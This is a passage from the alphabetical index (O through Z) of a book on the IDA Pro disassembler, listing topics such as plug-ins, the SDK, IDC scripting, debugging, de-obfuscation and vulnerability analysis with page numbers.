addresses, 437–444

imported function obfuscation,

444–448

targeted attacks on analysis

tools, 448–449

static de-obfuscation of binaries,

454–472

script-oriented, 455–460

x86emu emulation-oriented,

460–472

using debugger with, 543–560

decryption and decompression

loops, 546–550

hiding debugger, 555–560

import table reconstruction,

550–555

launching process, 545–546

overview, 540–541

virtual machine-based, 472–474

obfuscation process, 19, 541

obfuscators, 540, 548

objdump utility

debugging information, 24

disassembly listing, 24

private headers, 23

section headers, 23

symbol information, 24

object class, 256

object life cycle, in C++, 160–161

objects, in IDC language, 256–257

OEP (original entry point)

recognition, 540

Offset column, 90

offset cross-reference, 172–173

OllyDbg, 540

OllyDump, 541

OMF libraries, 219

op_t (ua.hpp), datatypes for SDK, 293,

303, 387

opcode bytes, 202

opcodes (operation codes), 4

Open command, file loading, 45

Open Register Window menu

item, 520

Open Subviews command, 57, 521

Open Subviews menu, 55, 60, 191

OpenRCE, 35, 280, 453, 499

OpenSSL cryptographic library,

215–216, 229

operand values, 303

operation codes (opcodes), 4

optimization, 428

Options checkboxes, 47

options for constants, formatting, 112

Options menu, Font menu, 519

optype_t constants, 388

OR operation, 458

ord function, 264

ord parameter, 364

ordinal number, 230

ordinary flow type, 62, 170

original entry point (OEP)

recognition, 540

Original value field, 239

OS X

console mode for, 194–196

installing on, 37–38

OS X Mach-O binaries, 24

Other option, IdaPdf, 510

otool utility, 23–24

out function, 395–396

out instruction, 456

out_line function, 396

out_one_operand function, 394, 395, 397

out_register function, 396

out_snprintf function, 395

out_symbol function, 396

out_tagoff function, 396

out_tagon function, 396

out.cpp file, 394

OUTDIR variable, 366

OutLine function, 396

OutMnem function, 395

outop function, 394, 398

output generator, 380

Output window, 56, 60, 66, 469

OutputDebugString function, 546

OutputDebugStringA function, 559–560

outputter, for processor modules,

394–399

OutValue function, 396

overlapping windowing capability,

TVision library, 190

overriding purged bytes,

manually, 230

Overview Navigator, 54, 215

overview navigator, IDA desktop, 54

p suffix, 171

__p__environ library function, 425

-P<password> command-line option, 571

-p<port number> command-line

option, 571

Pack database (Deflate) option, 52

Pack database (Store) option, 52

pack pragma, 136

packed data, restoring from, 53

PaiMei framework, 177

panning, in disassembly window,

62–63

para parameter, 308

parameters

names, formal, 228

naming, 102–103

passing, 255

recognition, automating, 277

Parameters option, debugger process

options dialog, 572

parsing errors, 258

Pascal directive, 231–232

Pascal-style strings, 71

Password option, debugger process

options dialog, 572

patch application event, 484

patch availability event, 484

Patch Bytes dialog, 238

Patch Program menu, 238–241

changing individual database bytes,

238–239

changing word in database, 239

using Assemble dialog, 239–241

Patch Tuesday cycle, Microsoft, 476

Patch Word dialog, 239

patch_byte function, 304

patch_long function, 304

patch_many_bytes function, 304

patch_word function, 304

patchable parameter, 364

PatchByte function, 262, 280, 458, 556

PatchDbgByte function, 556

PatchDiff2, 485–487

graphical function comparison, 487

Identical Functions, 486

Matched Functions, 486–487

Set Match dialog, 486

Set Match feature, 486

Unmatched Functions, 486–487

PatchDword function, 262, 279

patched files, 484

patching binaries, 237–245

after discovering vulnerability,

484–487

Patch Program menu, 238–241

Produce File menu, 241–245

ASM files, 242–243

DIF files, 244

EXE files, 243–244

HTML files, 245

INC (include) files, 243

LST files, 243

MAP files, 242

PatchWord function, 262

PatchXXX functions, 262, 465

pattern files, for FLIRT signature files,

219–221

pattern-matching, 39, 212

pat.txt file, FLAIR, 220

Pause button, toolbar buttons, 522

Pause Process option, Debugger

menu, 516

PC keyboard, vs. Mac keyboard, 194

pcap file format, 366

pcap loader, 366–372

pcap_file_header structure, 366, 369

pcap_types string, 368

pc.cmt file, 234

PDB (Program Database) file, 49

PDF files, 509

PDF Objects window, 510

PE (Portable Executable) format, 8,

19, 45, 224, 410, 545

binaries, Windows, 462

files, Windows, 467

mode, for Bochs, 576–577

signatures, 224

PE Sniffer utility, 19

PE Tools, 18–19

pe_ prefix, 224

pe_*.pat file, 224

pe_gcc.pat file, 224

pe_sections.idc script, 244

pe_vc.pat file, 224

PEB (process environment block),

462, 555–557, 576

PEiD, 19–20

pe.ldw (Windows PE loader), 45

persistent data storage, in IDC

language, 259–260

persistent named objects, 259

personal settings directory, 192

pe.sig file, 421

pfn pointer, 392

ph variable, 292

phrase field, 396

piracy, Hex-Rays stance on, 33

Pistelli, Daniel, 342

PlayStation PSX libraries, Sony, 219

plb.exe parser, 220

plb.txt file, 220

Please confirm dialog, 542

PLT (procedure linkage table), 274

.plt section, 478

plug-in configuration values, Visual

Studio, 328–329

PLUGIN object, 316

PLUGIN_ENTRY function, 344–345

PLUGIN_EXT variable, 366

plugin_file field, 330

PLUGIN_FIX bit, 318

PLUGIN_FIX flag, 319–320, 329

PLUGIN_KEEP value, 319

PLUGIN_OK value, 319

PLUGIN_PROC bit, 319

PLUGIN_PROC flag, 319–320

PLUGIN_SKIP value, 319

plugin_t class, 292, 316, 344, 359

PLUGIN_UNL flag, 319

PLUGIN_XXX constants, 316

PLUGIN.flags, 318

PLUGIN.init function, 319–320

PLUGIN.run function, 319, 323

PLUGIN.term function, 319, 322

PLUGIN.wanted_hotkey, 331

plug-ins, 315–346, 499–510

building, 324–329

class informer, 506–508

collabREate, 503–506

configuring, 330–331

for debugger, 536–538

directory for, 39, 288

event notification for, 321–322

execution of, 322–324

extending IDC with, 331–333

Hex-Rays, 500–502

IdaPdf, 509–510

IDAPython, 503

ida-x86emu, 506

initialization of, 320–321

installing, 329–330

life cycle of, 318–319

MyNav, 508–509

scripted, 344–346

user interface options for, 333–344

customized forms with SDK,

337–341

with Qt, 342–344

using SDK chooser dialogs,

334–337

Windows-only, 341–342

using during remote

debugging, 574

writing, 316–324

comment member, 317

flags field, 317

help member, 318

init member, 317

run member, 317

term member, 317

version field, 317

wanted_hotkey member, 318

wanted_name member, 318

plug-ins configuration file, 201

Plugins menu, Edit menu, 485, 508

plugins.cfg file, 201, 330

PointerToRawData field, 353, 355

polymorphism, 163

pop instruction, 392, 436

popa instruction, 459, 547–548

popf instruction, 459, 564

pop-up windows, tool tip–style, 129

Port option, debugger process

options dialog, 572

Portable Executable (PE) format. See

PE format

positive deltas, 392

POSIX wait function, 454

POSIX-style regular expressions, 99

PR_xxx flags, 385

pragma pack directive, 150

predecessor instruction, 177

Predefined symbols section, 258

Preferences dialog, X11, 196

prefixes, for autogenerated names, 73

Preserve case, 124

preventing debuggers, 453–454

PrevFunction function, 267

Previous button, 45

print function, 263

Print recursion dots, 184

print_type function, 164

printable characters, ASCII, 27

printf function, 87

printf_line function, 397

printf-style format string, 263

Problems window, 76–77

procedure linkage table (PLT), 274

process control tools, 519

process control, with debugger,

521–530

breakpoints, 522–526

stack traces, 528–529

tracing, 526–528

watches, 529–530

process environment block (PEB),

462, 555–557, 576

process image, 541–542

Process Monitor, 451

Process Options command, Debugger

menu, 571

Process Stalker component, PaiMei

framework, 177

process tracing, 454

ProcessDebugPort function, 557–558

processes, attaching debuggers to,

514–515

ProcessInformation parameter, 557

ProcessInformationClass parameter,

557–558

processor modules

architecture of, 409–411

building, 403–407

customizing existing, 407–409

and Python byte code, 378–379

scripting, 411–412

using SDK, 380–403

analyzer, 385–390

emulator, 390–394

initialization of LPH structure,

381–385

outputter, 394–399

processor notifications, 399–401

processor_t members, 401–403

processor_t struct, 380–381

processor notifications, 321

Processor Options button, 47

Processor options section, 203

Processor Type drop-down menu, 46

PROCESSOR_ENTRY function, 411

processor_t object, 320

processor_t struct, 380–381

processor_t.newprc notification, 402

procs directory, 39, 46

procs file, 403

proctemplate.py, 411

Produce File menu, 241–245

ASM files, 242–243

DIF files, 244

EXE files, 243–244

HTML files, 245

INC (include) files, 243

LST files, 243

MAP files, 242

Produce file submenu, File menu, 177

Program Database (PDB) file, 49

program entry point, 8

programs, in IDC language, 257–258

pro.h, for API, 290, 293

project properties dialog, Visual

Studio, 328

Project Selection dialog,

CollabREate, 505

prologue, of functions, 85

Propagate option, Set Match

dialog, 487

Properties dialog, 66

protected binary, Burneye, 467

pseudocode, Hex-Rays, 502

Pseudocode option, View menu, 500

pseudocode window, 501

ptrace API, 454

Public name option, for named

locations, 104

purchasing IDA, 34

purecall function, 159

Purged bytes attribute, 116–117

Purged bytes field, 230

Push Data button, Set Memory Values

dialog, 465

push instruction, 91, 392

push operations, 86

Push Stack Data dialog, 465

push statements, 275

pusha instruction, 459

pushf instruction, 459, 466

puts function, 181

.pyc files, 378, 393

Python byte code, 378–379

Python function, 481–482

Python interpreter, 378

Python script, 495, 549

Python website, IDAPython, 503

python_data function, 394

PYTHON_LAST constant, 382

QApplication class, 343

qfopen function, 291–292

qfprintf function, 291

qnumber macro, 383

qsnprintf function, 291, 343

qstrlen function, 343

qstrncpy function, 291

qstrXXXX function, 291

QT namespace, 342–343

Qt port, 176

Qt socket classes, 504

QuickEdit mode, 191

QuickUnpack, 442

Quit action, 205

qwingraph graph viewer, 176

qword field, 140

r value, 98

radio buttons, 339–340

RCE forums, 35, 499

.rdata section, 355, 419

rdtsc instruction, 471–472

read cross-reference, 172

read function, POSIX, 363

readelf utility, 24

readlong function, 265

readshort function, 265

README file, tilib utility, 156

readme.txt file

FLAIR, 219

idsutils, 231

SDK, 287, 380

readstr function, 265

read/write traces, 526

realcvt function, 401

rearranging blocks, in disassembly

window, 64

reasons, for disassembly

compiler validation, 7

debugging displays, 7

malware analysis, 6

software interoperability, 7

vulnerability analysis, 6–7

Rebase Program menu option, 351

Recent Scripts menu option, 250

Recent Scripts window, 250

recovering source code, 5

recursive descent algorithm, 13

recursive descent disassembly, 11–14

conditional branching

instructions, 11

function call instructions, 12

return instructions, 12–14

sequential flow instructions, 11

unconditional branching

instructions, 11

Recursive option, 183

recvfrom function, 498

Red Hat distributions, 219

redefine process, 436

referenced variables, stack frame

view, 97

references, in C++, 165–166

Refresh memory command, Debugger

menu, 579

reg.cpp file, 383

registry key, Windows, 45

RegNames array, 383

RegOpenKey function, 127, 228–229

regular comments, 107

regular expressions, POSIX-style, 99

relationships, deducing between

classes, 165

relative virtual address (RVA),

351–352

release binaries, vs. debug binaries,

428–430

Remote debugger configuration

dialog, 573–574

remote debugging, 569–574

attaching to remote process,

573–574

exception handling during, 574

using Hex-Rays debugging server,

570–573

using scripts and plug-ins

during, 574

Remove Function Tail option, 115

remove option (qwingraph), 194

Rename and Set Type option, 502

Rename option, context-sensitive

menu, 102

renaming

import table entries, 553

locations, 104–105

renimp.idc script, 552–554

reopening, IDA database files, 52–53

REP prefix, 527

repair option, Database Repair

dialog, 53

repeatable comments, 107–108

reporting bugs, 58

request_COMMAND function, 536

res->num field, 332

res->set_string, 333

Research & Resources forum,

Hex-Rays, 288

Reset Desktop command, 57

Reset desktop option, Windows

menu, 209

restarting IDA, after crashes, 52–53

restoring

hidden messages, 44

from packed data, 53

ResumeProcess macro, 533

RET instruction, 87

ret instruction, 91, 129

RET N variant, 117

return instructions, 12–14

return statement, 255–256, 466, 537

reverse engineering programs, 5

Rfirst function, 267

RfirstB function, 267

right-click options

constants, 112

data items, 121

and name changing, 102

in Segments window, 74

in Signatures window, 75

in Type Libraries window, 75

right-shift operator (>>), 253, 458

RISC-style architectures, 387

Rnext function, 267

RnextB function, 267

Roberts, J. C., 221

Rolles, Rolf, 378, 473

ROM images, 29, 348

RTCx, 428

RtlUserThreadStart function, 546

RTTI (Runtime Type Identification)

implementations

in C++, 163–164

compiler differences for, 420

RTTICompleteObjectLocator structure, 164

rules, for working with malware in

debugging environment, 543

Run button

exception confirmation dialog, 565

x86emu Emulator dialog, 464

Run command, 521

run function, 333, 536

run member, for plug-ins, 317

Run option, Debugger menu, 516

Run to Cursor button

toolbar buttons, 522

x86emu Emulator dialog, 463, 466

Run to Cursor command, in

Burneye, 467

Run to Cursor option, Debugger

menu, 516

Run Until Return button, toolbar

buttons, 522

run_requests function, 536–537

runtime errors, 258

Runtime Type Identification implementations.

See RTTI implementations

RunTo function, 532

Rutkowska, Joanna, 451

RVA (relative virtual address),

351–352

-S option (IDA), 197

Sabanal, Paul Vincent, 165

safeguarding key file, 34

sandbox environments, 443

Save Database dialog, 51

Save Desktop command, 57

Save Desktop option, Windows

menu, 519

Save Disassembly Desktop dialog, 209

save_file function, 360, 365

Saved registers attribute, 116

savefile function, 265

ScreenEA function, 263, 272

Script cancellation dialog, 258

script de-obfuscation of binaries,

455–460

script entry dialog, 251

Script File option, File menu, 554

script-based behavior, 576

scripting, 249–284

associating IDC scripts with

hotkeys, 261

for debugger, 530–535

execution of, 250–251

IDAPython, 280–281

IDAPython examples, 282–284

IDC examples, 270–280

emulating assembly language

behavior, 278–280


272–274

enumerating exported

functions, 275

enumerating functions, 270–271

enumerating instructions,

271–272

finding and labeling function

arguments, 275–277

IDC functions, 261–270

code cross-reference, 267

data cross-reference, 268

database manipulation, 268–269

database search, 269–270

dealing with functions, 266–267

disassembly line

components, 270

file input/output, 264–265

manipulating database

names, 266

reading and modifying data,

262–263

string-manipulation, 264

for user interaction, 263–264

IDC language, 251–260

error handling in, 258–259

expressions, 253

functions, 254–256

objects, 256–257

persistent data storage in,

259–260

programs, 257–258

statements, 254

variables, 252–253

loaders, 373–375

plug-ins, 344–346

processor modules, 411–412

using during remote

debugging, 574

scripting functions, Hex-Rays, 532

SDK (software development kit),

285–314

API (Application Programming

Interface), 289–314

header files, 290–294

iteration techniques using,

310–314

netnodes, 294–301

SDK datatypes, 302–303

SDK functions, 304

configuring build environment, 289

creating loader modules using,

358–360

creating processor modules using,

380–403

analyzer, 385–390

emulator, 390–394

initialization of LPH structure,

381–385

outputter, 394–399

processor notifications, 399–401

processor_t members, 401–403

processor_t struct, 380–381

directory layout

bin directory, 287

etc directory, 288

include directory, 288

ldr directory, 288

lib directory, 288

module directory, 288

plug-ins directory, 288

top-level directory, 288–289

functions, 587

IDC language cross-reference for,

585–608

implementation, IDC functions,

586–608

installing, 287

support, Hex-Rays, 58

sdk directory, 36

sdk_versions.h file, 293

search features, Search menu, 82

SEARCH_DOWN flag, 270

search.hpp, for API, 293

second-generation languages, 4

section:address portion, 110

SectionAlignment field, 352

SectionAlignment value, 352

SecureCRT, 193

segend function, 401

Segment Configuration dialog, 464

segment_t (segment.hpp), datatypes for

SDK, 293, 302

segment-creation dialog, 353

segmented addresses, 169

segment.hpp file, 293, 307, 353

Segments button, x86emu Emulator

dialog, 464

Segments window, 74, 543

segstart function, 401

SEH (structured exception handling)

process, 472

Chain plug-in, 566

exceptions, Windows, 565

handlers, 565–566

Select a debugger dialog, 516

Select Command dialog,

CollabREate, 505

Select Debugger option, Debugger

menu, 515–516, 548

SELinux, 38

semaphore, 438

semicolon (;) hotkey, 107

semicolon prefix, used for IDA

comments, 107–108

Sequence of Bytes option, 99, 493

sequential flow instructions, 11

Set Breakpoint option, 463

Set Function Type command, 128, 579

Set Import Address Save Point

option, 470

Set Match dialog

PatchDiff2, 486

Propagate option, 487

Set Match feature, PatchDiff2, 486

Set Match option, 487

Set Memory button, x86emu Emulator

dialog, 464–465

Set Memory Values dialog, 465

Set node color to default option, 186

Set specific options button, 572

Set Video Mode menu option,

Window menu, 191

set_idc_func_ex function, 331

set_idp_options function, 401

set_name function, 306

set_processor_type function, 410

set_reg_val function, 538

set_segm_addressing function, 363

SetArrayLong function, 301

SetArrayString function, 301

SetBptAttr function, 531

SetBptCnd function, 531, 554

SetRegValue function, 531

setting function type, 129

Setup Data Types dialog, Options

menu, 121, 144

Setup long names button, 163

Setup option, Strings window, 458

Setup short names button, 163

Setup Strings window, 70–71

shared library, 516

sharing TIL files, 155–156

shell script (#!/bin/sh), 16

shellcode, 29, 495–498

SHIFT-down arrow, 243

SHIFT-up arrow, 243

Shiva ELF obfuscation tool, 453

Shiva process, 454

Shiva program, 434–435, 437, 442

shnames data member, 401

SHOW_SP option, 202

show_wait_box function, 323

SHOW_XREFS option, 202

shr instruction, 458

shrd instruction, 458

Shrink Struct Type option, Edit

menu, 145

sidt instruction, 451

Siemens C166 microcontroller

application, 349

sig directory, 39

.sig file, 214

sigmake documentation file, 221

sigmake.exe utility, FLAIR, 221

sigmake.txt file, 222

signature selection dialog, 214

signature selection, FLIRT, 214

signatures

function type, 229

generating, 39

Signatures window, 74–75

Signed elements option, 126

signed shifts, 458

simple arithmetic instructions, 11

Simpleton file format, 373

simpleton loader, 361–366

simplex method, 230

Simplified Wrapper Interface Generator

(SWIG), IDAPython, 503

Sirmabus, 420, 506

size field, 386

size parameter, 307

SizeOfRawData field, 354

sizer function, 334

sizer parameter, 334

Skip button, x86emu Emulator

dialog, 463–464

Skochinsky, Igor, 165, 420, 507

slice operator, 253

sockaddr data structure, 69

socket descriptor, 489

SoftIce, 452

software breakpoints, 453, 523,

544, 546

software development kit. See SDK

software interoperability, reasons for

disassembly, 7

Solaris 10 x86 system, 219

solid arrows, 65

Sony PlayStation PSX libraries, 219

sorting alphabetically, in Functions

window, 82

source code recovery, 5

SPARC code, 410

sparse arrays, 259

splash screen, 44

sprintf function, 264, 273, 477

ssleay32.dll library, 232

SSLEAY32.idt file, 232

stack adjustments, 118

stack cleanup, 228

.stack database segment, 462

stack frames, 83–98

calling conventions for, 85–89

examples of, 89–93

as IDA structures, 146

local variable layout in, 89

viewing, 93–98

Stack pointer option, 110

stack pointers, adjustments for,

118–119

Stack Trace command, Debugger

menu, 528–529

stack traces, in debugger, 528–529

stack variables, 95, 102

Stack View window, 519

stack-allocated arrays, 132–134

stack-allocated structures, 138, 148

stack-based buffer overflow, 488

stack-manipulation operations, 11

standard calling convention, 87

standard structures, 151–154

standard template library (STL), 486

Start address attribute, 116

start function, 213, 443

Start Process option, Debugger menu,

516, 518

start symbol, 546

STARTITEM directives, 340

startup directory, FLAIR, 217, 224

startup routine, 224

startup signatures, 224–225

startup.bat file, 224

startup.idc, 577

statements, in IDC language, 254

static analysis, of malware, 6

static de-obfuscation of binaries,

454–472

script-oriented, 455–460

x86emu emulation-oriented,

460–472

and anti-debugging, 471–472

de-obfuscation using, 465–470

features of, 470–471

initialization of, 462

operation of, 463–465

Static func attribute, 117

static keyword, 254–255

static libraries, for FLIRT signatures,

217–219

static linking function, 22

statically linked binaries, 178

stats netnode, 537

stdcall calling convention, 87, 118,

230, 294, 468

stdcall functions, 116, 228, 464, 467,

558–559

_stdcall modifier, 87

Step button, x86emu Emulator

dialog, 463

Step command, 521

Step Into button, toolbar buttons, 522

Step Over button, toolbar buttons, 522

StepInto function, 532

StepOver function, 532–533

StepUntilRet function, 532

STL (standard template library), 486

Stop on debugging message option,

Debugger Setup dialog, 546

Stop on debugging start option,

Debugger Setup dialog, 546

Stop on library load/unload option,

Debugger Setup dialog, 546

Stop on process entry point option,

Debugger Setup dialog, 546

Stop on thread start/exit option,

Debugger Setup dialog, 546

STOP_CODE constant, 383

storage, of bytes, 97

Store (Pack database) option, 52

store_til function, 369

stosb instruction, 458

strcat function, 253

strcpy function, 175, 253, 273,

477–478, 480

strdup function, 253

stream argument, 491

stream disassemblers, 28

string data configuration, 72, 123

string scanning, 70

strings

C-style null-terminated, 122

displaying in Strings windows, 70

double-clicking, 70

options for, 122–124

Unicode, 99

using on executable files, 28

utility, 27–28

strings command, 71, 212

strings utility, 446

Strings window

Display only defined strings

option, 71

Ignore instructions/data definitions

option, 71–72

overview, 70

strip utility, 18

stripping binary executable files, 18

strlen function, 264

strstr function, 264

struc_t (struct.hpp), datatypes for SDK,

293, 303, 306, 308, 311

Struct Var option, Edit menu, 147

struct.hpp (struc_t), datatypes for

SDK, 303

struct.hpp, for API, 293

structure definition

collapsed, 146

empty, 143

structure members, enumerating, 311

Structure name field, Create

Structure/Union dialog, 143

structure notation, 149

structure offset, applying, 147

structure selection dialog, 147

structure templates, using, 146–149

structured exception handling (SEH)

process, 472

structures

collapsing, 154

expanding, 153

fields, changing name of, 144

formatting global variables as, 149

master list of, 152

Structures window, 69, 142–143

stubs, 403–405

substr function, 264

successor instruction, 177

summary stack view, 97

superclass constructors, 164

support

Hex-Rays support page and

forums, 35

IDA Palace, 36

Ilfak’s blog, 36

official help documentation, 35

OpenRCE.org, 35

RCE forums, 35

supset function, 299

supstr function, 299

supval function, 299

supvals, 297–298

swidth component, 338

SWIG (Simplified Wrapper Interface

Generator), IDAPython, 503

Switch Debugger menu, Debugger

menu, 516

switch statements, compiler differences

for, 416–420

Switch Thread option, Emulate

menu, 471

switch variable, 417

symbols

appearing in comments, 175

displayed on Imports window, 69

global (external), 20

symbol-selection dialog, 113

Synchronize to idb option, 150

synchronizing activities, using

CollabREate, 504

synchronous debugger function, 532

synchronous interaction, 536–537

system calls, 89

-t command-line argument

(strings), 28

tabs, IDA desktop, 55

tags, 297

Take Memory Snapshot command,

Debugger menu, 542

.tar file, 36

Target assembler, 243

target assembly language syntax, 243

TASM (Borland’s Turbo

Assembler), 9

TCP session, 496

TEB (thread environment block),

439, 462, 556, 565, 576

tElock program, 438, 440, 442

Tenable Security, 342

term member, for plug-ins, 317

term method, 536

term_output_buffer function, 395

Terminal application, Mac, 194

Terminal keyboard settings dialog,

Mac, 195

terminal programs, Linux, 192

Terminate button, toolbar

buttons, 522

Terminate Process option, Debugger

menu, 517

text display, Linux, 192

Text option, Hex window, 67

Text Search dialog, 99

text searches, of database, 99

.text section, 241, 353, 355, 423

text view, switching to graph view, 185

text-mode user interface configuration

file, 39

The initial autoanalysis has been

finished message, 57, 211

third-generation languages, 4

third-party graph viewer, 176

this pointer, in C++, 156–157

This type of output file is not

supported message, 243

thiscall calling convention, 88, 156

thread environment block (TEB),

439, 462, 556, 565, 576

thread information block (TIB), 556

Thread Local Storage (TLS) callback

functions, 545–546, 556

ThreadInformationClass parameter, 559

Threads view, 519

thunk functions, 428–429

ThunRTMain function, 427

TIB (thread information block), 556

TIB[NNNNNNNN] database section, 565

til directory, 40

TIL files, 49

loading new, 155

overview, 154

sharing, 155–156

til2idb function, 367

tilib tool, Hex-Rays, 155

time stamp counter (TSC), 471

timelimit option, 194

tips and tricks, for IDA Desktop, 57

Title case, 124

TLS (Thread Local Storage) callback

functions, 545–546, 556

tmainCRTStartup function, 426

to address, in cross-references, 168

toggling values, 520

tool tip–style pop-up window, 129

toolbar

area, IDA desktop, 53

arrangements, 208

buttons, 208, 521–522

configuration menu, 209

customizing, 208–210

Toolbars command, 53

tools

c++filt utility, 25–26

for deep inspection, 27–29

dumpbin utility, 25

for file classification, 16–20

ldd utility, 22–23

nm utility, 20–21

objdump utility, 23–24

otool utility, 24

Tools menu, PE Tools, 19

top-level directory, for SDK, 288–289

TouchArg function, 391

Trace buffer size option, Tracing

Options dialog, 526

Trace checkbox, Breakpoint Settings

dialog, 526

trace option, 526

Trace over debugger segments option,

Tracing Options dialog, 528

Trace over library functions option,

Tracing Options dialog, 528

trace_level parameter, 533

tracing, in debugger, 526–528

Tracing Options dialog, 526–528

trampoline, 493

translate function, 401

TriMedia libraries, 219

TSC (time stamp counter), 471

TTY console, 197

Turbodiff, 485

turn color off tag, 396

turn color on tag, 396

TVHEADLESS environment variable, 197

TVision library, 190

TVision port, 193

TVOPT settings, 193

tvtuning.txt, 193

two-digit hex values, 99

type component, 338

type field, 303, 338, 388

Type Libraries window, 75

typedef statement, 151

TypeDescriptor structure, 164

typeid operator, 163

typinf.hpp, 293, 367

U hotkey, 119, 144

u_ana member, 385

u_emu member, 391

u_out member, 394

u_outspec function, 401

ua_next_xxx functions, 386

ua.hpp file, 293, 385

ui_notification_t constants, 305

uname command, 326

uncollapsing nodes, 187

uncompressing UPX binary, using

emulator, 467

unconditional branching

instructions, 11

Undefine option, 119, 435

undefine process, 436

undefining functions, 119

undetected string data, 72

undo command, absence of, 59

undo feature, 40

undocumented CPU instructions, 110

Ungroup Nodes option, 187

Unicode strings option, 71, 99, 447

universal unpacker, Hex-Rays, 550

Unix-style make files, 289

Unmatched Functions, PatchDiff2,

486–487

unsigned shifts, 458

untar archive, 37

upgrading, 34

uppercase letter codes, 21

UPX

decompression routine, 547–548

decompression stub, 442

packer, 442

program, 441, 548, 552–553

UPX-packed binaries, 540

Use “dup” construct option, 126

Use graph view by default checkbox,

Graph tab, 55

Use option key as meta key checkbox,

Terminal application, 194

USE_DANGEROUS_FUNCTIONS macro, 290

USE_STANDARD_FILE_FUNCTIONS macro,

291, 365

User cross-reference graph dialog, 183

user interface

of IDA Pro, 40

for plug-ins, 333–344

customized forms with SDK,

337–341

with Qt, 342–344

using SDK chooser dialogs,

334–337

Windows-only, 341–342

user interface notifications, 321

User xref charts, 182

User xref graph, 184

User Xrefs Chart option, Graphs

menu, 182

__usercall calling convention, 431

user-generated cross-reference

graphs, 185

utilities directory, 36

-v command-line option (debugging

server), 571

va_arg macro, C++, 322

var_ prefix, 95

variables

in IDC language, 252–253

index values of, 132

names, IDA-generated, 96–97

vc32rtf signatures, 75

vcsample file, 289

Veracode, 476

version field, 317, 385

version member, 359

versions, 33

vertices, 64, 168

VGA font, 193

View menu

Cross References option, 477

Enumerate Heap option, 471

Pseudocode option, 500

View window, 530

viewing machine language bytes, 111

virtual addresses, 64

virtual functions, 157–160, 173

virtual machine-based obfuscation,

472–474

virtual repeatable comment, 108

VirtualAddress field, 353

VirtualAlloc function, 468, 477, 576,

578–579

virtualization

detecting, 449–451

processor-specific behavioral

changes, 451

specific behaviors, 450–451

specific hardware, 450

specific software, 450

software, 449

virtualizing obfuscator, 442

Visual C++ compiler, Microsoft, 114

Visual Studio suite, Microsoft, 25

Visual Studio Win32 Application

Wizard, 327

VMProtect, 442, 472

VMware Tools collection, 450–451

VPAGESIZE option, 202

vtables, in C++, 157–160

vulnerability advisory, 484

vulnerability analysis, 475–498

analyzing shellcode, 495–498

discovering vulnerabilities,

476–483

exploit-development process,

488–495

finding useful virtual addresses,

494–495

locating instruction sequences,

492–494

stack frame breakdown, 488–492

handling after-fact discoveries,

483–487

reasons for disassembly, 6–7

vulnerability discovery, 6

w suffix, 172, 447

Wait For Next Event (WFNE)

flags, 532

wait_for_next_event function, 538

wanted_hotkey data member, 318, 330

wanted_hotkey value, 318

wanted_name data member, 318, 330

Warning function, 263, 272

warning function, 305

warnings, for loaders, 49

wasBreak function, 323

Watch Address dialog, 530

Watch List option, Debugger

menu, 530

watch lists, 529

watch points, 529

watches, in debugger, 529–530

Weak name option, for named

locations, 105

weak symbol, marking, 105

web server, Apache, 23

Welcome dialog, 44

WFNE (Wait For Next Event)

flags, 532

WFNE_CONT flag, 533

WFNE_SUSP event type, 533

Whittaker, Andy, 349

width characters, 395

width component, 338

Width field, 124

widths parameter, 336

wildcards, 205

Win32 Application Wizard, Visual

Studio, 327

Win32 Project template, 327

win32_remote.exe server

component, 570

win64_remotex64.exe server

component, 570

wince_remote_arm.dll server

component, 570

Windows

console mode for, 191

installing on, 36–37

launching installer, 36

“Windows Anti-Debug Reference”

article, 555–558

Windows Asynchronous Sockets

techniques, 504

Windows calculator program, 25

Windows CE ARM, 517

Windows library handle, 468

Windows menu, Save Desktop

option, 519

Windows PE binaries, ida-x86emu

plug-in, 462

Windows PE file, manually loading,

349–357

Windows PE loader (pe.ldw), 45

Windows registry key, 45

Windows SEH exceptions, 565

Windows SEH handlers, 565

wingraph32 application, 176

WinGraph32 window, 180

WinHelp-style help files, 204

wininet.dll file, 516

WinLicense, 442, 448

WinMain function, 422

WinMain variation, 421

Wireshark, 366, 451, 496

word. See 2 bytes of storage (dw)

Word function, 262

word-patching capability, 239

wrapper code, 180

write cross-references, 172

write traces, 526

write4 capability, 488

writelong function, 265

writeshort function, 265

writestr function, 265

ws2_32 networking library, 553

X Windows consoles, 193

X11, installing, 195

X.25-style network connection, 113

x86 code, 410

x86 compiler, 87

x86 hardware-debug registers, 472

x86 instruction, 204

x86 processor module, 47

x86emu breakpoints, 463

x86emu emulator, de-obfuscation of

binaries using, 460–472

and anti-debugging, 471–472

de-obfuscation using, 465–470

features of, 470–471

initialization of, 462

operation of, 463–465

x86emu Emulator dialog

Jump To Cursor button, 464

Push Data button, 465

Run button, 464

Run To Cursor button, 463, 466

Segments button, 464

Set Memory button, 464–465

Skip button, 463–464

Step button, 463

x86emu library function dialog, 469

x86emu plug-in, 461

x86emu Set Memory Values

dialog, 465

.xinitrc file, 195

XML templates, 360

xmodmap command, 196

.Xmodmap file, 195

xmodmap utility, 195

xor instruction, 436

xrefblk_t structure, 283, 309, 312–313

xref.hpp file, 293–294, 309, 392

xrefs (cross-references).

See cross-references

Xrefs From graph, 181–182

Xrefs To graph, 180–181

XrefsFrom generator, 283

XrefType function, 267–268, 273, 309

xterm, running, 193

xtol function, 264

XXXset function, 298

XXXval function, 298

Y hotkey, 128

y variable, 91, 94

Yason, Mark Vincent, 165

Yes edge arrow, 62

You may start to explore the input file

right now message, 57

Zbikowski, Mark, 16

zoom control, keyboard, 62

ZwContinue function, 567

UPDATES

Visit http://nostarch.com/idapro2.htm for updates, errata, and other information.
